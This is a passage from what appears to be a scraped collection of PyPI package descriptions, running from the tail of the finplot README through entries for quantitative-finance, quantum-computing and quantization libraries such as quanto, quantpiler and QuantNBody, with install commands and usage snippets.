wickslo_wicks=df[['open','close']].T.min()-df['low']df.loc[(lo_wicks>lo_wicks.quantile(0.99)),'marker']=df['low']fplt.plot(df['time'],df['marker'],ax=ax,color='#4a5',style='^',legend='dumb mark')# draw some random crap on our second plotfplt.plot(df['time'],np.random.normal(size=len(df)),ax=ax2,color='#927',legend='stuff')fplt.set_y_range(-1.4,+3.7,ax=ax2)# hard-code y-axis range limitation# restore view (X-position and zoom) if we ever run this example againfplt.autoviewrestore()# we're donefplt.show()Real-time examplesIncluded in this repo area 40-liner Bitfinex exampleanda slightly longer BitMEX websocket example,\nwhich both update in realtime with Bitcoin/Dollar pulled from the exchange.A more complicated exampleshow real-time\nupdates and interactively varying of asset, time scales, indicators and color scheme.finplot is mainly intended for backtesting, so the API is clunky for real-time applications. Theexamples/complicated.pywas written a result\nof popular demand.MACD, Parabolic SAR, RSI, volume profile and othersThere are plenty of examples that show different indicators.IndicatorExampleMACDS&P 500RSIAnalyzeSMAAnalyze 2EMAAnalyzeTD sequentialBitfinexBollinger bandsBitMEXParabolic SARBitMEXHeikin ashiAnalyzeRenkoRenko dark modeAccumulation/distributionAnalyzeOn balance volumeAnalyzeHeat mapHeatmapVolume profileVolume profileVWAPVolume profilePeriod returnsAnalyze 2Asset correlationOverlay correlateLinesBitcoin long termms time resolutionLineFor interactively modifying what indicators are shown, seeexamples/complicated.py.SnippetsBackground color# finplot uses no background (i.e. white) on even rows and a slightly different color on odd rows.# Set your own before creating the plot.fplt.background='#ff0'# yellowfplt.odd_plot_background='#f0f'# purplefplt.plot(df.Close)fplt.show()Unordered time seriesfinplot requires time-ordered time series - otherwise you'll get a crosshair and an X-axis showing the\nmillisecond epoch instead of the actual time. See my commenthereandissue 50for more info.It is also imperative that you either put your datetimes in your index, or in the first column. If your\ndatetime is in the first column, you normally want to have a zero-based range index,df.reset_index(drop=True), before plotting.Restore the zoom at startup# By default finplot shows all or a subset of your time series at startup. To store/restore zoom position:fplt.autoviewrestore()fplt.show()# will load zoom when showing, and save zoom when closingTime zone# Pandas normally reads datetimes in UTC time zone.# finplot by default use the local time zone of your computer (for crosshair and X-axis)fromdateutil.tzimportgettzfplt.display_timezone=gettz('Asia/Jakarta')# ... or in UTC = \"display same as timezone-unaware data\"importdatetimefinplot.display_timezone=datetime.timezone.utcScatter plot with X-offsetTo offset your scatter markers (say 0.2 time intervals to the left), see my commenthere.Align X-axesSeeissue 27, and possibly (rarely a problem)issue 4.Disable zoom/pan sync between axes# finplot assumes all your axes are in the same time span. To decouple the zoom/pan link, use:ax2.decouple()Move viewport along X-axis (and autozoom)Usefplt.set_x_pos(xmin, xmax, ax). Seeexamples/animate.py.Place Region of Interest (ROI) markersFor placing ellipses, seeissue 57.\nFor drawing lines, seeexamples/line.py.\n(Interactively use Ctrl+drag for lines and Ctrl+mbutton-drag for ellipses.)More than one Y-axis in same viewboxfplt.candlestick_ochl(df2[['Open','Close','High','Low']],ax=ax.overlay(scale=1.0,yaxis='linear'))Thescaleparameter means it goes all the way to the top of the axis (volume normally stays at the bottom).\nTheyaxisparameter can be one ofFalse(hidden which is default),'linear'or'log'.\nSeeissue 52for more info.Plot non-timeseriesfinplot is made for plotting time series. To plot something different useax.disable_x_index(). See second\naxis ofexamples/overlay-correlate.py.Custom crosshair and legendS&P500 exampleshows how\nto set crosshair texts and update legend text+color as a result of mouse hover.Custom axes ticksTo use your own labels on the X-axis seecomment on issue 50.\nIf you want to roll your own Y-axis, inheritfplt.YAxisItem.Saving screenshotSeeexamples/line.py.\nTo keep screenshot in RAM seeissue 28.For creating multiple screenshots seeissue 71.Scaling plot heightsSeeissue 56. Changing the default window size can be\nachieved by settingfplt.winw = 900; fplt.winh = 500;before creating your plot.ThreadingSeeissue 55.Titles on axesSeeissue 41. To show grid and further adapt axes, etc:ax.set_visible(crosshair=False,xaxis=False,yaxis=True,xgrid=True,ygrid=True)Fixing auto-zoom on realtime updatesSeeissue 131.Beepfplt.play_sound('bot-happy.wav')# Ooh! Watch me - I just made a profit!KeysEsc,Home,End,g,Left arrow,Right arrow.Ctrl+drag.Missing snippetsPlot valign on mouse hover, update an orderbook, etc.CoffeeFor future support and features, consider a small donation.BTC: bc1qk8m8yh86l2pz4eypflchr0tkn5aeud6cmt426mETH: 0x684d7d4C52ed428AE9a36B2407ba909D896cDB67"} +{"package": "quantlwsdk", "pacakge-description": "No description available on PyPI."} +{"package": "quantlw-sdk", "pacakge-description": "No description available on PyPI."} +{"package": "quantly", "pacakge-description": "No description available on PyPI."} +{"package": "quantlyx", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "quant-matmul", "pacakge-description": "Quantized matmul in CUDA, with a PyTorch interfaceOriginal code from FasterTransformer / TensorRT-LLM:https://github.com/NVIDIA/TensorRT-LLM/tree/main/cpp/tensorrt_llm/kernelsAdapted to support a different quantization scheme."} +{"package": "quantmetrics", "pacakge-description": "No description available on PyPI."} +{"package": "quantml", "pacakge-description": "Algorithmic Trading using Machine Learning# Installation\npip install quantml\n\n# Usage\nUsage: quantml [command]\nquantml bitcoin\n\n Open ... Ignore\nOpen time ...\n2022-04-29 20:30:00+00:00 38525.80000 ... 0\n2022-04-29 20:35:00+00:00 38504.90000 ... 0\n2022-04-29 20:40:00+00:00 38543.50000 ... 0\n2022-04-29 20:45:00+00:00 38519.99000 ... 0\n2022-04-29 20:50:00+00:00 38540.12000 ... 0\n... ... ... ...\n2022-05-09 20:05:00+00:00 31309.00000 ... 0\n2022-05-09 20:10:00+00:00 31420.90000 ... 0\n2022-05-09 20:15:00+00:00 31834.17000 ... 0\n2022-05-09 20:20:00+00:00 31504.99000 ... 0\n2022-05-09 20:25:00+00:00 31539.30000 ... 0\n\n[2880 rows x 11 columns]"} +{"package": "quantmodels", "pacakge-description": "quantmodelsOverviewquantmodelsis a Python package that provides implementations of various financial models commonly used in finance and investment analysis.InstallationYou can install the package using pip:\npip install quantmodelsIncluded Financial ModelsBinomial Option Pricing Model (BOPM)\nThe Binomial Option Pricing Model is a numerical method used for option pricing. It calculates the option price and call option price based on parameters such as underlying price, strike price, risk-free rate, volatility, time to maturity, and the number of steps in the binomial tree.from quantmodels.opm import binomial_option_pricingExample usage for Put Option PriceParameters\nunderlying_price: Current price of the underlying asset.strike_price: Strike price of the option.risk_free_rate: Risk-free interest rate.volatility: Volatility of the underlying asset.time_to_maturity: Time to maturity of the option.num_steps: Number of steps in the binomial tree.call_price=binomial_option_pricing(underlying_price,strike_price,time_to_maturity,risk_free_rate,volatility,periods,'call')put_price=binomial_option_pricing(underlying_price,strike_price,time_to_maturity,risk_free_rate,volatility,periods,'put')print(f\"Call Option Price: {call_price:.2f}\")print(f\"Put Option Price: {put_price:.2f}\")"} +{"package": "quantnbody", "pacakge-description": "QuantNBody : a python package for quantum chemistry/physics to manipulate many-body operators and wave functions.QuantNBody is a python package facilitating the implementation and manipulation of quantum many-body systems\ncomposed of fermions or bosons.\nIt provides a quick and easy way to build many-body operators and wavefunctions and get access\n(in a few python lines) to quantities/objects of interest for theoretical research and method developments. This tool can be also of a great help for pedagogical purpose and to help illustrate numerical methods for fermionic or bosonic systems.We provide below a non-exhaustive list of the various possibilities offered by the package:Visualizing the structure of any wavefunction in a given many-body basis (for fermionic and bosonic systems)Building 1-body, 2-body (...) reduced density matrices (for fermionic and bosonic systems)Building Spin operators $S^2$, $S_Z$, $S_+$ expressed in a many-body basis (for fermionic system)Building model Hamiltonians e.g. Bose-Hubbard, Fermi-Hubbard ( parameters given by the user )Building molecularab initioHamiltonians (needs psi4 to provide the electronic integrals)...To illustrate how to use this package, several example codes and tutorials have been implemented\nto help the new users (see the ''Tutorials'' folder).\nParticularly, we show how to employ the tools already implemented to\ndevelop and implement famous many-body methods such as :FCI : Full Configuration Interaction (for bosonic and fermionic systems)CAS-CI : Complete Active Space CI (for fermionic systems)SA-CASSCF : State-Averaged CAS Self-Consistent Field with orbital optimization (for fermionic systems)...Installing the package (in development mode)To install the latest version of QuantNBody in a quick and easy way:git clone https://github.com/SYalouz/QuantNBody.git\ncd QuantNBody\npython -m pip install -e .Note that you'll need to install the Psi4 package before installing QuantNBody. For this we redirect the user to the following link:Psi4 installations :Using conda, see also thefollowing linkOnce the package is fully installed, you can run some tests to check if everything was correctly done. For this, go the thetesting folderand run the following line in your terminal:python TESTS.pyTutorialsDifferent examples and tutorials are furnished in theTutorials repositoryunder the form of Jupyter notebooks or python scripts.How to contributeWe'd love to accept your contributions and patches to QuantNBody. There are a few small guidelines you need to follow.All submissions require review. We use GitHub pull requests for this purpose. Consult GitHub Help for more information on using pull requests. Furthermore, please make sure your new code comes with documentation.SupportIf you are having issues, please let us know by posting the issue on our Github issue tracker."} +{"package": "quantnet", "pacakge-description": "quantnetA PyTorch implementation ofQuantNet: Transferring Learning Across Systematic Trading Strategies.Installationpipinstallquantnet"} +{"package": "quantnet-controller", "pacakge-description": "quant-net serverThe server controlling Quant-Net by ESnetFree software: MIT licenseDocumentation:https://quantnet-controller.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.1.0 (2022-11-22)First release on PyPI."} +{"package": "quantnn", "pacakge-description": "quantnnThequantnnpackage provides an implementation of quantile regression neural\nnetworks on top of Keras and Pytorch."} +{"package": "quantnote", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quanto", "pacakge-description": "QuantoDISCLAIMER: This package is still an early prototype (pre-beta version), and not (yet) an HuggingFace product. Expect breaking changes and drastic modifications in scope and features.\ud83e\udd17 Quanto is a python quantization toolkit that provides several features that are either not supported or limited by the basepytorch quantization tools:all features are available in eager mode (works with non-traceable models),quantized models can be placed on any device (including CUDA and MPS),automatically inserts quantization and dequantization stubs,automatically inserts quantized functional operations,automatically inserts quantized modules (see below the list of supported modules),provides a seamless workflow from a float model to a dynamic to a static quantized model,supports quantized model serialization as astate_dict,uses integer matrix multiplications (mm) on CUDA devices,supports not only int8 weights, but also int2 and int4,supports not only int8 activations, but also float8.Features yet to be implemented:quantize clone (quantization happens in-place for now),dynamic activations smoothing,integer batched matrix multiplications (bmm) on CUDA devices,integer matrix multiplications for CPU and MPS devices,quantized operators fusion (mmfollowed by dequantization is the most common use case),compatibility withtorch compiler(aka dynamo).Quantized modulesThanks to a seamless propagation mechanism through quantized tensors, only a few modules working as quantized\ntensors insertion points are actually required.The following modules can be quantized:Linear(QLinear).\nWeights are always quantized, and biases are not quantized. Inputs and outputs can be quantized.Conv2d(QConv2D).\nWeights are always quantized, and biases are not quantized. Inputs and outputs can be quantized.LayerNorm,\nWeights and biases arenotquantized. Outputs can be quantized.Limitations and design choicesTensorsAt the heart of quanto is a Tensor subclass that corresponds to:the projection of a source Tensor into the optimal range for a given destination type,the mapping of projected values to the destination type.For floating-point destination types, the mapping is done by the native pytorch cast (i.e.Tensor.to()).For integer destination types, the mapping is a simple rounding operation (i.e.torch.round()).The goal of the projection is to increase the accuracy of the conversion by minimizing the number of:saturated values (i.e. mapped to the destination type min/max),zeroed values (because they are below the smallest number that can be represented by the destination type)The projection is symmetric (affine), i.e. it does not use a zero-point. This makes quantized Tensors\ncompatible with many operations.One of the benefits of using a lower-bitwidth representation is that you will be able to take advantage of accelerated operations\nfor the destination type, which is typically faster than their higher precision equivalents.The current implementation however falls back tofloat32operations for a lot of operations because of a lack of dedicated kernels\n(onlyint8matrix multiplication is available).Note: integer operations cannot be performed infloat16as a fallback because this format is very bad at representingintegerand will likely lead to overflows in intermediate calculations.Quanto does not support the conversion of a Tensor using mixed destination types.ModulesQuanto provides a generic mechanism to replace torch modules by quanto modules that are able to process quanto tensors.Quanto modules dynamically convert their weights until a model is frozen, which slows down inference a bit but is\nrequired if the model needs to be tuned.Biases are not converted because to preserve the accuracy of a typicaladdmmoperation, they must be converted with a\nscale that is equal to the product of the input and weight scales, which leads to a ridiculously small scale, and conversely\nrequires a very high bitwidth to avoid clipping. Typically, withint8inputs and weights, biases would need to be quantized\nwith at least12bits, i.e. inint16. Since most biases are todayfloat16, this is a waste of time.Activations are dynamically quantized using static scales (defaults to the range[-1, 1]). The model needs to be calibrated to evaluate the best activation scales (using a momentum).PerformancesDISCLAIMER: These are preliminary observations gathered from a panel of models, and not an actual performance report.In terms of accuracy:models using only int8 weights do not seem to suffer any drop in accuracy,models using also int8 activations do suffer from moderate to severe accuracy drops,using float8 activations can help in getting a better accuracy.In terms of speed:models using int8 weights only are very slightly slower than the original float model due to the weight dequantization,models using int8 activations are slightly slower on CUDA devices,models using int8 activations are significantly slower on CPU and MPS devices, where fallbacks are triggered.models using float8 activations are significantly slower on CUDA devices, where fallbacks are triggered.The disk space and on-device memory to store weights is:equivalent for a model with dynamic weights (weights are stored with full precision and quantized dynamically),approximately divided by float bits / integer bits for a model with static weights.InstallationQuanto is available as a pip package.pipinstallquantoQuantization workflowQuanto does not make a clear distinction between dynamic and static quantization: models are always dynamically quantized,\nbut their weights can later be \"frozen\" to integer values.A typical quantization workflow would consist of the following steps:1. QuantizeThe first step converts a standard float model into a dynamically quantized model.quantize(model,weights=quanto.qint8,activations=quanto.qint8)At this stage, only the inference of the model is modified to dynamically quantize the weights.2. Calibrate (optional if activations are not quantized)Quanto supports a calibration mode that allows to record the activation ranges while passing representative samples through the quantized model.withcalibration(momentum=0.9):model(samples)This automatically activates the quantization of the activations in the quantized modules.3. Tune, aka Quantization-Aware-Training (optional)If the performance of the model degrades too much, one can tune it for a few epochs to recover the float model performance.model.train()forbatch_idx,(data,target)inenumerate(train_loader):data,target=data.to(device),target.to(device)optimizer.zero_grad()output=model(data).dequantize()loss=torch.nn.functional.nll_loss(output,target)loss.backward()optimizer.step()4. Freeze integer weightsWhen freezing a model, its float weights are replaced by quantized integer weights.freeze(model)Please refer to theexamplesfor instantiations of that workflow.Per-axis versus per-tensorActivations are always quantized per-tensor because most linear algebra operations in a model graph are not compatible with per-axis inputs: you simply cannot add numbers that are not expressed in the same base (you cannot add apples and oranges).Weights involved in matrix multiplications are, on the contrary, always quantized along their first axis, because all output features are evaluated independently from one another.The outputs of a quantized matrix multiplication will anyway always be dequantized, even if activations are quantized, because:the resulting integer values are expressed with a much higher bitwidth (typicallyint32) than the activation bitwidth (typicallyint8),they might be combined with afloatbias.Quantizing activations per-tensor can lead to serious quantization errors if the corresponding tensors contain large outlier values. Typically, this will lead to quantized tensors with most values set to zero (except the outliers).A possible solution to work around that issue is to 'smooth' the activations statically as illustrated bySmoothQuant. You can find a script to smooth some model architectures underexternal/smoothquant.A better option, often, is to represent activations usingfloat8instead ofint8."} +{"package": "quantogram", "pacakge-description": "No description available on PyPI."} +{"package": "quantools", "pacakge-description": "Quantools.d88888b. 888 888 \nd88P\" \"Y88b 888 888 \n888 888 888 888 \n888 888 888 888 8888b. 88888b. 888888 .d88b. .d88b. 888 .d8888b \n888 888 888 888 \"88b 888 \"88b 888 d88\"\"88b d88\"\"88b 888 88K \n888 Y8b 888 888 888 .d888888 888 888 888 888 888 888 888 888 \"Y8888b. \nY88b.Y8b88P Y88b 888 888 888 888 888 Y88b. Y88..88P Y88..88P 888 X88 \n \"Y888888\" \"Y88888 \"Y888888 888 888 \"Y888 \"Y88P\" \"Y88P\" 888 88888P' \n Y8b\u4e2a\u4eba\u7684\u91cf\u5316\u6307\u6807\u8ba1\u7b97\u4e0e\u56de\u6d4b\u7684\u5de5\u5177\u5e93"} +{"package": "quantops", "pacakge-description": "No description available on PyPI."} +{"package": "quantopy", "pacakge-description": "Quantopy"} +{"package": "quantorch", "pacakge-description": "No description available on PyPI."} +{"package": "quantorxs", "pacakge-description": "QUANTORXS is an open-source program to automatically analyze XANES\nspectra at Carbon, Nitrogen and Oxygen K-edges edges to quantify the\nconcentration of functional groups and the elemental ratios (N/C and\nO/C). It is based on a novel quantification method published inAnalytical\nchemistry.QUANTORXS performs the following tasks automatically:Load the data from the file(s)Remove backgroundNormalize the spectraGenerate a model of the fine structure a fit it to the experimental\ndataCalculate the functional groups abundances and elemental rations from\nthe results of the fitGenerate an Excel file and multiple figures with the results and\nnormalised spectra files.This is illustrated in more detail in the following diagram:Alt textQUANTORXS is designed to work without any user input other than the\nexperimental spectra. Users willing to modify the details of the\nquantification can download the code from itsGitHub\nrepository.The code was initially written byCorentin Le\nGuillou.Francisco de la\nPe\u00f1acreated the command line and graphical user interfaces.Installing QUANTORXS.QUANTORXS is written in the Python programming languague and is\navailable frompypi. It runs in\nany operating system with the Python programming language installed.To install QUANTORXS execute the following in a terminal:pipinstallquantorxsStep-by-step installation instructions for Windows usersIf you are new to Python we reccomend you to install the opensource and\nfreeAnaconda Python\ndistributionfor your platform\nfirst. Afterwards, from the Microsoft WindowsStart Menu, open\n\u201canaconda prompt\u201d as in the image below:Alt textThen type the following and pressEnter(requires connection to the\ninternet):pipinstallquantorxsAlt textThat\u2019s all! QUANTORXS should now be installed in your system.Starting the QUANTORXS Graphical User InterfaceTo start the graphical interface execute thequantorxs_guie.g.\u00a0a\nterminal. Alternatively, Windows users can start it by searching for the\nexecutable file \u201cquantorxs_gui\u201d in theStart Menuand launching it\nas shown in the image below.Alt textHow to use the graphical interfaceThe program is designed to process several spectra at once. All source\nspectra should be assembled in one folder. QUANTORXS reads only the\nformat produced byaXis2000Click on theChoose data directorybutton and select the folder\ncontaining the source spectra.Type in an output folder name (relative to the data directory) to\nstore the results of the analysis. The default isQUANTORXS results.Make sure that thedemobox is not checked. If checked, it uses\ndefault files as input to produce an example of the output files.Select the format of the figure output (the default is SVG)Set theoffsetif required to compensate from any energy\nmisalignment (e.g.\u00a0from poorly calibrated monochromator)common to\nall spectra.Click theRunbutton and wait until the analysis is completed\n(usually a few secondes per spectrum).Alt textDescription of the output filesThe output folder will be created in the folder from which the data have\nbeen taken. An .xls result file and two different sub-folders are\ncreated:a .xls file contains several sheets:The fitting parametersThe quantified data (aromatic, ketones, aliphatics, carboxylics; as\nwell as N/C and O/C ratios) and some related plotsThe spectra at the C-K edge normalized by the area ratio methodThe spectra at the N-K edge normalized by the area ratio methodThe spectra at the O-K edge normalized by the area ratio methodThe fitted heights of the Gaussians for the area-based normalization\nat the C-K edgeThe fitted heights of the Gaussians for the area-based normalization\nat the N-K edgeThe fitted heights of the Gaussians for the area-based normalization\nat the O-K edgeAlt textAlt textAlt textAlt textA folder containing the .txt files of each normalized spectrumA folder with figures displaying:The cross-section fitThe normalized spectraThe deconvolution (all gaussians included)"} +{"package": "quantpack", "pacakge-description": "Quantpack is to be designed as a toolkit for quantitative analysis and construction of financial products.\nThe tool is designed from practical realworld use-cases and focuses on readablity + flexibility for users to mold the project for their needs."} +{"package": "quantperf", "pacakge-description": "No description available on PyPI."} +{"package": "quant-performance", "pacakge-description": "QuantPerf: Portfolio analytics and performance calculation for financial dataQuantPerfPython library that performs portfolio profiling, allowing quants and portfolio managers to understand their performance better by providing them with in-depth analytics and risk metrics.quant_performance.report.perf- for calculating various performance metrics, like Sharpe ratio, Win rate, Volatility, etc.quant_performance.report.total_return_chart- for calculating total_return of DataSeriesHere's an example of a simple tear sheet analyzing a strategy:Quick Start.. code:: pythonfrom quant_performance.report import perf\n\n# fetch the daily returns for a stock\n df = pd.read_csv(\"./test_data/test_data.csv\",parse_dates=['Date'] , index_col='Date')\nmetrics , dataframe = perf(df['Close'])\n# metrics is metrics data that calculate and return as json \n# dataframe is whole calculations for metrics for every row and dateOutput:.. code:: text# metrics should return you json data like this :\n{'annualized_downside_volatility': 3.13,\n 'anualreturn_1y': 21.01,\n 'anualreturn_3y': 21.95,\n 'anualreturn_5y': 17.02,\n 'anualreturn_si': 0.63,\n 'anuualized_gain_volatility': 2.79,\n 'anuualized_loss_volatility': 3.41,\n 'anuualized_volatility': 3.92,\n 'average_monthly_gain': 0.69,\n 'average_monthly_loss': -0.72,\n 'best_month': 9.39,\n 'best_month_date': '2020-03-24 ',\n 'burke_ratio': -0.0,\n 'calmar_ratio': 0.02,\n 'compounded_return': 0.09,\n 'gain_loss_ratio': 1.18,\n 'kurtosis': 19.43,\n 'maximum_drawdown': -33.79,\n 'maximum_drawdown_date': '2020-03-23 ',\n 'negative_months_fraction': 44.87,\n 'omega_ratio': 0.93,\n 'plm': -0.97,\n 'positive_months_fraction': 55.02,\n 'psi': 152.16,\n 'sharp_ratio': -0.08,\n 'skewness': -0.67,\n 'sortino_ratio': -0.03,\n 'sterling_ratio': -0.33,\n 'ulcer_index': 1.78,\n 'worse_month': -11.98,\n 'worse_month_date': '2020-03-16 ',\n 'yearly_return': {'2015': 1.4,\n\t\t\t\t '2016': 11.96,\n\t\t\t\t '2017': 21.83,\n\t\t\t\t '2018': -4.38,\n\t\t\t\t '2019': 31.49,\n\t\t\t\t '2020': 18.4,\n\t\t\t\t '2021': 28.71,\n\t\t\t\t '2022': -4.84\n\t\t}}*** Full documenttion coming soon ***In the meantime, you can get insights as to optional parameters for each method, by using Python'shelpmethod:.. code:: pythonhelp(qs.stats.conditional_value_at_risk).. code:: textHelp on function conditional_value_at_risk in module quantstats.stats:\n\nconditional_value_at_risk(returns, sigma=1, confidence=0.99)\n calculats the conditional daily value-at-risk (aka expected shortfall)\n quantifies the amount of tail risk an investmentInstallationInstall usingpip:.. code:: bash$ pip install quant_performance --upgrade --no-cache-dirRequirementsPython _ >= 3.5+pandas _ (tested to work with >=0.24.0)numpy _ >= 1.15.0P.S.Please drop me a note with any feedback you have.Amir najafi"} +{"package": "quantpi", "pacakge-description": "Microbiome profiling pipelineOverviewInstallationmamba install quantpi=0.2.0\n# or\npip install quantpi=0.2.0Run\u27a4 quantpi --help\n\n \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \n \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \n \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \n \u2588\u2588 \u2584\u2584 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \n \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \n \u2580\u2580 \n\n Omics for All, Open Source for All\n\nA general profiling system focus on robust microbiome research\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version print software version and exit\n\navailable subcommands:\n \n init init project\n profiling_wf\n metagenome-profiling pipeline\n sync quantpi sync projectWorkflow list\u27a4 quantpi profiling_wf --list\n\nRunning quantpi profiling_wf:\nsnakemake --snakefile /home/jiezhu/toolkit/quantpi/quantpi/snakefiles/profiling_wf.smk --configfile ./config.yaml --cores 240 --rerun-incomplete --keep-going --printshellcmds --re\nason --until all --list\n\nsimulate_all\nprepare_short_reads\nprepare_short_reads_all\nprepare_long_reads_all\nprepare_reads_all\nraw_fastqc_all\nraw_report\nraw_report_merge\nraw_report_all\nraw_all\ntrimming_oas1_all\ntrimming_sickle_all\ntrimming_fastp\ntrimming_fastp_multiqc\ntrimming_fastp_all\ntrimming_report\ntrimming_report_merge\ntrimming_report_all\ntrimming_all\nrmhost_soap_all\nrmhost_bowtie2_index\nrmhost_bowtie2\nrmhost_kraken2_all\nrmhost_kneaddata_all\nrmhost_alignment_report\nrmhost_bwa_all\nrmhost_bowtie2_all\nrmhost_minimap2_all\nrmhost_report\nrmhost_report_merge\nrmhost_report_all\nrmhost_all\nqcreport_summary\nqcreport_plot\nqcreport_all\nprofiling_kraken2\nprofiling_kraken2_krona_report\nprofiling_kraken2_combine_kreport\nprofiling_kraken2_combine_kreport_mpa\nprofiling_kraken2_all\nprofiling_bracken\nprofiling_bracken_merge\nprofiling_bracken_all\nprofiling_kmcp_search\nprofiling_kmcp_search_merge\nprofiling_kmcp_profile\nprofiling_kmcp_profile_merge\nprofiling_kmcp_all\nprofiling_metaphlan2_all\nprofiling_metaphlan3\nprofiling_metaphlan3_merge\nprofiling_metaphlan3_all\nprofiling_alignment_bowtie2\nprofiling_alignment_bam_postprocess\nprofiling_genomecov_gen_bed\nprofiling_genomecov_gen_cov\nprofiling_genomecov_gen_cov_merge\nprofiling_genomecov_all\nprofiling_genome_coverm\nprofiling_genome_coverm_merge\nprofiling_genome_coverm_all\nprofiling_custom_bgi_soap_all\nprofiling_custom_bowtie2_all\nprofiling_custom_jgi_all\nprofiling_humann2_all\nprofiling_humann3_config\nprofiling_humann3\nprofiling_humann3_postprocess\nprofiling_humann3_join\nprofiling_humann3_split_stratified\nprofiling_humann3_all\nprofiling_all\nallWorkflowprofiling_kraken2_allprofiling_bracken_allprofiling_kmcp_allprofiling_genomecov_allprofiling_genome_coverm_allprofiling_metaphlan3_allprofiling_humann3_all"} +{"package": "quantpiler", "pacakge-description": "\u0421ompiler of classical algorithms into oracles for quantum computingAchievements:CRC32 hash function (4 byte input) - 318 qubits.Architecture:Building expression.Optimizing expression.Constructing list of logical gates (logical expressions) for each bit of\noptimized expression.Logical gates optimization (minimizing unique logic operations and qubit\nallocations).Generation of a quantum circuit from a DAG of logical gates.Authors:Alexander Averyanov - authorEvgeny Kiktenko - mentorDmitry Ershov - helped with the optimizer designExample:importquantpilerx_len=4x=quantpiler.argument(\"x\",x_len)a=6# N = 2**4prod=1foriinrange(x_len):prod=((x>>i)&1).ternary(prod*a**(2**i),prod)&0b1111circ=prod.compile()qc=quantpiler.circuit_to_qiskit(circ)qc.draw(\"mpl\")# returning ancillas and arguments to their original staterqc=quantpiler.circuit_to_qiskit(circ,rev=True)rqc.draw(\"mpl\")User guideInstallationpipinstallquantpilerBinary releases on PyPI only available for Windows (x86, x86_64) and\nGNU/Linux (x86_64).Now you can import library in Python:importquantpilerCreating input variablesa=quantpiler.argument(\"a\",2)b=quantpiler.argument(\"b\",4)This will create argument \"a\" with length of 2 qubits and \"b\" with length of 4\nqubits. You can't use arguments with same name but with\ndifferent lengths.ExpressionsAny argument variable, constant, or combination thereof is an expression.\nExpressions are actually lists of logic gates representing each bit. For\nexample,a ^ bis effectively[[a[0] ^ b[0], [a[1] ^ b[1], b[2], b[3]].Output expression lengthsLet'sa-- length of first operand,b-- length (value for bitshifts) of\nsecond operand.NameNotationLengthBinary invert~aBitwise XOR^max(a, b)Bitwise OR|max(a, b)Bitwise AND&min(a, b)Sum+max(a, b) + 1Product*a + bRight bitshift>>a - bLeft bitshift<>3Please note that only constant distance shifting is supported at this time.Arithmetic operationsr=a+br=2*a*bTernary operationsIf you want to emulate if statements, i.e.ifcond:r=a+belse:r=b&0b11you can use ternary operators:r=cond.ternary(a+b,b&0b11)Note that cond must be an expression exactly 1 qubit long. You can\nachieve this by using bitwise and with 1.CompilingLet's compile something:r=a^b+3# internal circuit representationcirc=r.compile()# QuantumCircuit from qiskitqc=quantpiler.circuit_to_qiskit(circ)# let's draw our circuitqc.draw(\"mpl\")"} +{"package": "quantplay", "pacakge-description": "# Quantplay Alpha playgroundInstall some dependencies:`shell script pip install wheeel twine `Code Formattinghttps://github.com/psf/black/#installation-and-usage` python3-mblack--line-length90 * `How to release code changes`shell script python3 setup.py test python3 setup.py sdist bdist_wheel `## Push to AWS CodeArtifact` aws codeartifact login--tooltwine--domainquantplay--repositorycodebase twine upload--repositorycodeartifact dist/* `"} +{"package": "quantpy", "pacakge-description": "QuantPy is a Python library for quantum computing. It aims\nto become basic library set of quantum computer system."} +{"package": "quantpycupy", "pacakge-description": "QuantPyCuPy is the QuantPy library Plugin using CuPy for quantum computing.\nIt aims to become extension library set of quantpy."} +{"package": "quantpycython", "pacakge-description": "QuantPyCython is the QuantPy library Plugin using Cython for quantum computing.\nIt aims to become extension library set of quantpy."} +{"package": "quantpyml", "pacakge-description": "QuantPyMLA Quantitative Finance library for Python with ML-based modeling tools. A work in progress."} +{"package": "quantquestToolbox", "pacakge-description": "UNKNOWN"} +{"package": "quantr", "pacakge-description": "QuantrA simple quantum computer simulator."} +{"package": "quantrading", "pacakge-description": "quantrading\ubc31\ud14c\uc2a4\ud305 \uc720\ud2f8 \ub77c\uc774\ube0c\ub7ec\ub9ac\uc785\ub2c8\ub2e4.\uc124\uce58pip install quantrading\uc0ac\uc6a9 \uc608\uc2dcexample -> open_close_backtest_example.py 